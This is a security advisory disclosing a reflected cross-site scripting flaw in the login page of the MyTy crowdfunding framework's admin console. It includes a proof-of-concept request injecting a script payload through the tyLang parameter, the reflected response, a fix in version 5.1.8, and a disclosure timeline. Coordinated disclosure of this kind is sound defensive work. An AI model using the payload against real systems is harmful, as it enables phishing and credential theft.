############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: MyTy # Vendor: Finlane GmbH # CSNC ID: CSNC-2017-030 # CVE ID: - # Subject: Reflected Cross-Site Scripting (XSS) # Risk: High # Effect: Remotely exploitable # Author: Nicolas Heiniger <nicolas.heiniger@xxxxxxxxxxxxxxxxxxxx> # Date: 21.11.2017 # ############################################################# Introduction: ------------- MyTy[1] is a software framework that includes a crowdfunding module. It can be installed on a customer server and used to create whitelabel websites for crowdfunding platforms. Compass Security discovered a web application security flaw in the login page of the administration web console that allows an unauthenticated attacker to execute JavaScript code in the browser of a legitimate user. This allows, for instance, to redirect the user to a phishing page and gather credentials. Affected: --------- Vulnerable: * MyTy 5.1.0 to 5.1.7 Technical Description --------------------- In the login page of the administration console, a tyLang parameter is passed together with the user and the password in the login request. This parameter is then included unencoded in the HTTP response. The login request for a proof of concept is as follows: =============== POST /tycon/index.php HTTP/1.1 Host: [CUT BY COMPASS] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: [CUT BY COMPASS] Cookie: tyFl=de_de; XSRF-TOKEN=ZNc%2FZRg4sCgXP0g3IZZ8QxsO7caLshyKp7u75yiyW5o%3D; lang=de; PHPSESSID=b4pcsacfvpv716e3l825cqbuo3; tyBl=en_us; cfce=1; _ga=GA1.2.75537659.1504612703; cf_cookie_policy_read=1; _gid=GA1.2.1498092563.1504761922 CSNC-HEN: Pentest1-Blue Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 97 view=default&fromTopic=&tyLang=de"</script><script>alert(1)</script> &seleted_user_id=0&seleted_user_hash=&name=admin&password=123456 =============== The HTTP response shows that the payload is returned unencoded in the HTML page: =============== HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Sep 2017 06:52:05 GMT Content-Type: text/html; charset=utf-8 [CUT BY COMPASS] <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex,nofollow"> <base target="_top"/> <title>myty-Login | myty 5.1.7/2017-09-06</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"/> <!-- Adding "maximum-scale=1" fixes the Mobile Safari auto-zoom bug: http://filamentgroup.com/examples/iosScaleBug/ --> <link href="/tycon/themes/spring/styles/defaultlogin.css" rel="stylesheet" type="text/css"/> <!--[if gte IE 9]> <style type="text/css"> .gradient {filter: none;} </style> <![endif]--> <script src="/3rdParty/bower_components/jquery/dist/jquery.min.js"> </script> <script type="text/javascript">var myty = { version: '5.1.7', revision: 5001007, backend: { basepath: '/tycon', language: 'de"</script><script>alert(1)</script>', themepath: '/tycon/themes/spring' }, [CUT BY COMPASS] =============== Workaround / Fix: ----------------- Install an up to date version of the MyTy software. As a developer: This issue can be fixed by properly encoding dangerous characters in the output according to the encoding rules of the respective type of context (HTML body, argument, JS string, generated URLs). For normal HTML body content, the following HTML entities can be used: < -> < > -> > " -> " ' -> ' & -> & Timeline: --------- 2017-11-21: Coordinated public disclosure date 2017-09-08: Release of fix in version 5.1.8 2017-09-08: Initial vendor response 2017-09-07: Initial vendor notification 2017-09-07: Discovery by Nicolas Heiniger References: ----------- [1] https://www.finlane.com/loesungen/whitelabel-pages/